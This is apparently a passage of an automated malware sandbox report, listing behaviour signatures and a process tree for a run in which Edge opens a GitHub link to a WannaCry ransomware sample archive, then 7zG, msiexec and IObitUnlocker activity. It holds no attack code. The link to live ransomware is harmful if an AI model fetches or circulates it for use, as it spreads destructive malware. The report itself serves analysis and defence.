pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 33 IoCs
pid Process 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 4840 7zG.exe Token: 35 4840 7zG.exe Token: SeSecurityPrivilege 4840 7zG.exe Token: SeSecurityPrivilege 4840 7zG.exe Token: SeRestorePrivilege 3640 7zG.exe Token: 35 3640 7zG.exe Token: SeSecurityPrivilege 3640 7zG.exe Token: SeSecurityPrivilege 3640 7zG.exe Token: SeRestorePrivilege 2808 7zG.exe Token: 35 2808 7zG.exe Token: SeSecurityPrivilege 2808 7zG.exe Token: SeSecurityPrivilege 2808 7zG.exe Token: SeRestorePrivilege 4904 7zG.exe Token: 35 4904 7zG.exe Token: SeSecurityPrivilege 4904 7zG.exe Token: SeSecurityPrivilege 4904 7zG.exe Token: SeShutdownPrivilege 5796 msiexec.exe Token: SeIncreaseQuotaPrivilege 5796 msiexec.exe Token: SeSecurityPrivilege 5896 msiexec.exe Token: SeCreateTokenPrivilege 5796 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5796 msiexec.exe Token: SeLockMemoryPrivilege 5796 msiexec.exe Token: SeIncreaseQuotaPrivilege 5796 msiexec.exe Token: SeMachineAccountPrivilege 5796 msiexec.exe Token: SeTcbPrivilege 5796 msiexec.exe Token: SeSecurityPrivilege 5796 msiexec.exe Token: SeTakeOwnershipPrivilege 5796 msiexec.exe Token: SeLoadDriverPrivilege 5796 msiexec.exe Token: SeSystemProfilePrivilege 5796 msiexec.exe Token: SeSystemtimePrivilege 5796 msiexec.exe Token: SeProfSingleProcessPrivilege 5796 msiexec.exe Token: SeIncBasePriorityPrivilege 5796 msiexec.exe Token: SeCreatePagefilePrivilege 5796 msiexec.exe Token: SeCreatePermanentPrivilege 5796 msiexec.exe Token: SeBackupPrivilege 5796 msiexec.exe Token: SeRestorePrivilege 5796 msiexec.exe Token: SeShutdownPrivilege 5796 msiexec.exe Token: SeDebugPrivilege 5796 msiexec.exe Token: SeAuditPrivilege 5796 msiexec.exe Token: SeSystemEnvironmentPrivilege 5796 msiexec.exe Token: SeChangeNotifyPrivilege 5796 msiexec.exe Token: SeRemoteShutdownPrivilege 5796 msiexec.exe Token: SeUndockPrivilege 5796 msiexec.exe Token: SeSyncAgentPrivilege 5796 msiexec.exe Token: SeEnableDelegationPrivilege 5796 msiexec.exe Token: SeManageVolumePrivilege 5796 msiexec.exe Token: SeImpersonatePrivilege 5796 msiexec.exe Token: SeCreateGlobalPrivilege 5796 msiexec.exe Token: SeBackupPrivilege 5964 vssvc.exe Token: SeRestorePrivilege 5964 vssvc.exe Token: SeAuditPrivilege 5964 vssvc.exe Token: SeBackupPrivilege 5896 msiexec.exe Token: SeRestorePrivilege 5896 msiexec.exe Token: SeRestorePrivilege 5896 msiexec.exe Token: SeTakeOwnershipPrivilege 5896 msiexec.exe Token: SeRestorePrivilege 5896 msiexec.exe Token: SeTakeOwnershipPrivilege 5896 msiexec.exe Token: SeRestorePrivilege 5896 msiexec.exe Token: SeTakeOwnershipPrivilege 5896 msiexec.exe Token: SeRestorePrivilege 5896 msiexec.exe Token: SeTakeOwnershipPrivilege 5896 msiexec.exe Token: SeRestorePrivilege 5896 msiexec.exe Token: SeTakeOwnershipPrivilege 5896 msiexec.exe Token: SeRestorePrivilege 5896 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 4840 7zG.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 3640 7zG.exe 5180 msedge.exe 5180 msedge.exe 2808 7zG.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 4904 7zG.exe 5796 msiexec.exe 5796 msiexec.exe 3500 7zG.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe 5180 msedge.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 5180 msedge.exe 5180 msedge.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 5112 IObitUnlocker.exe 312 IObitUnlocker.exe 4056 IObitUnlocker.exe 2464 IObitUnlocker.exe 2112 IObitUnlocker.exe 3356 IObitUnlocker.exe 5912 IObitUnlocker.exe 3028 IObitUnlocker.exe 2396 IObitUnlocker.exe 5536 IObitUnlocker.exe 1472 IObitUnlocker.exe 556 IObitUnlocker.exe 5848 IObitUnlocker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5180 wrote to memory of 3420 5180 msedge.exe 85 PID 5180 wrote to memory of 3420 5180 msedge.exe 85 PID 5180 wrote to memory of 4532 5180 msedge.exe 86 PID 5180 wrote to memory of 4532 5180 msedge.exe 86 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4588 5180 msedge.exe 87 PID 5180 wrote to memory of 4688 5180 msedge.exe 88 PID 5180 wrote to memory of 4688 5180 msedge.exe 88 PID 5180 wrote to memory of 4688 5180 msedge.exe 88 PID 5180 wrote to memory of 4688 5180 msedge.exe 88 PID 5180 wrote to memory of 4688 5180 msedge.exe 88 PID 5180 wrote to memory of 4688 5180 msedge.exe 88 PID 5180 wrote to memory of 4688 5180 msedge.exe 88 PID 5180 wrote to memory of 4688 5180 msedge.exe 88 PID 5180 wrote to memory of 4688 5180 msedge.exe 88 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/fabrimagic72/malware-samples/blob/master/Ransomware/Wannacry/smb-y16ftv9_.zip1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5180 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2f0,0x7ffb0988f208,0x7ffb0988f214,0x7ffb0988f2202⤵PID:3420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:32⤵PID:4532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2244,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=2240 /prefetch:22⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2572,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=2716 /prefetch:82⤵PID:4688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3460,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:12⤵PID:4848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3476,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:12⤵PID:4860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5220,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5280 /prefetch:82⤵PID:1392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5228,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5300 /prefetch:82⤵PID:2952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5912,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5872 /prefetch:82⤵PID:2548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5912,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5872 /prefetch:82⤵PID:3024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6044,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6016 /prefetch:82⤵PID:4796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4968,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:82⤵PID:1304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5028,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5064 /prefetch:12⤵PID:5820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6504,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6520 /prefetch:82⤵PID:5624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6036,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6520 /prefetch:12⤵PID:5100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6012,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6964 /prefetch:82⤵PID:4496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5968,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6884 /prefetch:82⤵PID:1904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5988,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6976 /prefetch:82⤵PID:872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6396,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5608 /prefetch:82⤵PID:4604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:82⤵PID:3204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=872,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:82⤵PID:4392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5248,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6320 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7036,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:82⤵PID:2644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=5704,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6016 /prefetch:12⤵PID:1384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4996,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7024 /prefetch:82⤵PID:3340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=5944,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6428 /prefetch:12⤵PID:3160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6060,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5476 /prefetch:82⤵PID:2948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5192,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5484 /prefetch:82⤵PID:624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=5320,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:12⤵PID:4516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5560,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=4892 /prefetch:82⤵PID:3680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6560,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=5184 /prefetch:82⤵PID:1904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=5500,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=3100 /prefetch:12⤵PID:2728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=3684,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7188 /prefetch:12⤵PID:5436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5040,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6920 /prefetch:12⤵PID:2932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7280,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:12⤵PID:3544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7412,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7432 /prefetch:82⤵PID:4472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=7608,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=7596 /prefetch:12⤵PID:5720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,10978004647999610671,6317413655936584811,262144 --variations-seed-version --mojo-platform-channel-handle=6672 /prefetch:82⤵PID:3640
-
-
